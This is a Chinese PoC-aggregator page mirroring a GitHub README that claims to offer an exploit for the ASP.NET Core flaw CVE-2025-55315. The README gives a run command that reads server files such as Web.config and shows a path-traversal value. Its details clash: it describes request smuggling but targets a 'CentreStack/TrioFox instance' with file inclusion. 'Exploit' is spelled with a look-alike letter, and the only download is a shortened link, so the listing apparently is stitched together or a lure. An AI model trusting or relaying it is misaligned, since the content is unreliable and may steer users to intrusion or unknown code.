POC详情: 669ee8be604754317b1d06b78485a11aad02f470

来源
https://github.com/RootAid/CVE-2025-55315
关联漏洞
标题: Microsoft ASP.NET Core 环境问题漏洞 (CVE-2025-55315)
描述:Microsoft ASP.NET Core是美国微软(Microsoft)公司的一框跨平台开源框架。该框架用于构建Web应用、物联网应用和移动后端等基于云的应用程序。 Microsoft ASP.NET Core存在环境问题漏洞,该漏洞源于攻击者利用该漏洞可以绕过某些功能。
介绍
# CVE-2025-55315

### Overview
A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, enabling HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, 9.0, allowing an authorized attacker to bypass security features over a network.

### Versions
Asp.net Core 8.0
Asp.net Core 9.0
Asp.net Core 2.3
Microsoft Visual Studio 2022 Version 17.12

### Published Date
14 October 2025

### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.9 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`


### How It Works
An attacker with low-privilege network access can: - Bypass front-end security controls - View sensitive data including user credentials - Modify server files - Potentially hijack user sessions - Breach security boundaries between system components The vulnerability has a high severity with significant impacts on confidentiality, integrity, and potential unauthorized access.

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-55315 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC explоit download [here](https://tinyurl.com/3rht2j66)
文件快照

 [4.0K]  /data/pocs/669ee8be604754317b1d06b78485a11aad02f470
└── [2.0K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。